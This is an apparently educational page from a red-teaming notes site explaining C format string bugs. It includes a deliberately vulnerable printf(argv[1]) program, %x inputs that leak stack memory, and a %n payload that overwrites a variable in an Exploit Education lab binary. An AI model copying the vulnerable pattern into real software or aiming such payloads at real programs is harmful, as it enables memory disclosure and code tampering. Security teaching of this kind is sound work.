Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
CreateRemoteThread Shellcode Injection
DLL Injection
Reflective DLL Injection
Shellcode Reflective DLL Injection
Process Doppelganging
Loading and Executing Shellcode From PE Resources
Process Hollowing and Portable Executable Relocations
APC Queue Code Injection
Early Bird APC Queue Code Injection
Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert
Shellcode Execution through Fibers
Shellcode Execution via CreateThreadpoolWait
Local Shellcode Execution without Windows APIs
Injecting to Remote Process via Thread Hijacking
SetWindowHookEx Code Injection
Finding Kernel32 Base and Function Addresses in Shellcode
Executing Shellcode with Inline Assembly in C/C++
Writing Custom Shellcode Encoders and Decoders
Backdooring PE Files with Shellcode
NtCreateSection + NtMapViewOfSection Code Injection
AddressOfEntryPoint Code Injection without VirtualAllocEx RWX
Module Stomping for Shellcode Injection
PE Injection: Executing PEs inside Remote Processes
API Monitoring and Hooking for Offensive Tooling
Windows API Hooking
Import Adress Table (IAT) Hooking
DLL Injection via a Custom .NET Garbage Collector
Writing and Compiling Shellcode in C
Injecting .NET Assembly to an Unmanaged Process
Binary Exploitation
32-bit Stack-based Buffer Overflow
64-bit Stack-based Buffer Overflow
Return-to-libc / ret2libc
ROP Chaining: Return Oriented Programming
SEH Based Buffer Overflow
Format String Bug
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Format String Bug
Some notes on what a format string bug is and how it looks like in real life.

Overview

Format String bug appears in programs written in C, which means this bug is applicable to all operating systems that have a C compiler, or in other words - most of OSes.

What is Format String?

printf format string refers to a control parameter used by a class of functions in the input/output libraries of C and many other programming languages. The string is written in a simple template language: characters are usually copied literally into the function's output, but format specifiers, which start with a % character, indicate the location and method to translate a piece of data (such as a number) to characters. https://en.wikipedia.org/wiki/Printf_format_string​
In other words, format string allows the programmer to specify how a certain value, say a floating-point number such as money savings, should be printed to the screen.
Let's look at the below code example, where the savings variable is defined as a floating value of 345.82, which is printed to the screen with printf, using the format string Savings: $%f:
The %f in the format string tells the printf() to print the value of savings as a floating-point value.
fmt-00.c
1
#include <stdio.h>
2
#include <stdlib.h>
3
​
4
int main( int argc, char *argv[] )
5
{
6
double savings = 345.82;
7
8
// The first argument is the format string.
9
// It tells printf to print the value of savings as a floating value.
10
printf("Savings: $%f", savings);
11
return 0;
12
}
Copied!
Let's compile, run the code and observe the result:
1
gcc .\fmt-00.c -o fmt-00.exe; .\fmt-00.exe
Copied!
...we can see that the savings value was printed with 6 decimal places:
However, $345.820000 is not the precision we need when dealing with money, so it would look better if the value only had 2 decimal places, such as $345.82. With the help of format string Savings: $%.2f, we can achieve exactly that:

What is Format String Bug?

Programs become vulnerable to the format string bug when user supplied data is included in the format string the program uses to display the data when in print functions such as (not limited to):
1
printf
2
fprintf
3
sprintf
4
snprintf
5
...
Copied!

Memory Read

Format string vulnerabilities make it possible to read stack memory of the vulnerable program.
Let's look at the sample code provided below, that takes in the user supplied argument 1 and uses it in inside the function printf, which means that the user's supplied string is used as a format string for the printf function:
fmt.c
1
#include <stdio.h>
2
#include <stdlib.h>
3
​
4
int main( int argc, char *argv[] )
5
{
6
if( argc != 2 )
7
{
8
printf("Error - supply a format string please\n");
9
return 1;
10
}
11
​
12
printf( argv[1] );
13
printf( "\n" );
14
​
15
return 0;
16
}
Copied!
Let's compile and run the program without feeding it any strings first:
1
gcc .\fmt.c -o fmt.exe; .\fmt.exe
Copied!
Let's now supply a string format, say Testing: 0x%x:
1
gcc .\fmt.c -o fmt.exe; .\fmt.exe "Testing: 0x%x"
Copied!
Considering the fact that the format string is supplied, but the corresponding variable is not (which would be provided in the program written by a programmer, however in our case we are supplying the format string to the program via a commandline argument without associated variables), the program simply starts reading values from the stack memory. Note that there is nothing preventing us from reading even multiple values from the stack too:
1
gcc .\fmt.c -o fmt.exe; .\fmt.exe "Reading stack memory: 0x%x 0x%x 0x%x 0x%x"
Copied!
The above example illustrates how it may be possible to abuse this bug to read program's stack memory, which may reveal some sensitive information, such as authentication passwords.

Memory Write

Format string vulnerabilities make it possible to write to arbitrary memory locations inside the vulnerable program.
To see this in action, we're going to use the following purposely vulnerable code from:
Format One :: Andrew Griffiths' Exploit Education
1
#include <stdlib.h>
2
#include <unistd.h>
3
#include <stdio.h>
4
#include <string.h>
5
​
6
int target;
7
​
8
void vuln(char *string)
9
{
10
printf(string);
11
12
if(target) {
13
printf("you have modified the target :)\n");
14
}
15
}
16
​
17
int main(int argc, char **argv)
18
{
19
vuln(argv[1]);
20
}
Copied!
1
./format1 "` python -c "print 'AAAA' + 'x38\x96\x04\x08' + 'BBBBBBBBBBBBBBBBBBBBBB' + '%x '*128 " `"; echo
Copied!

Exploit

1
./format1 "` python -c "print 'AAAA' + 'x38\x96\x04\x08' + 'BBBBBBBBBBBBBBBBBBBBBB' + '%x '*127 + '%n ' " `"; echo
Copied!
It's possible to abuse format bugs to execute shellcode, but I could not get my dev environment setup to reproduce the exploitation examples found in the book and online, so these notes are parked for the time being.

References

The Shellcoder's Handbook: Discovering and Exploiting Security Holes, 2nd Edition
Wiley.com
Previous
SEH Based Buffer Overflow
Next - offensive security
Defense Evasion
Last modified 6mo ago
Copy link
Contents
Overview
What is Format String?
What is Format String Bug?
Memory Read
Memory Write
Exploit
References